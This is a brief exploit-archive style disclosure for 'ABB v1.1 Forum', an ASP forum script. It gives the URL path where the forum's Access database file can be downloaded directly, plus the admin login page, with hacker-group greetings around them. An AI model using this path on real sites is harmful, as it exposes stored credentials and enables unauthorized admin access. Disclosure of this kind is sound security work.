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IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
[»] Script: [ ABB Forums ]
[»] Language: [ ASP ]
[»] Site page:[ Possede de tres nombreuses options d administration et de configuration ]
[»] Founder:[ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to:[ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com]
[»] My Home:[ HackTeach.Org , Islam-Attack.Com ]
===[ Exploit ]===
[»] http://server/[path]/fpdb/abb.mdb
===[ Admin Login ]===
[»] http://server/[path]/admin.asp
Author: ViRuSMaN <-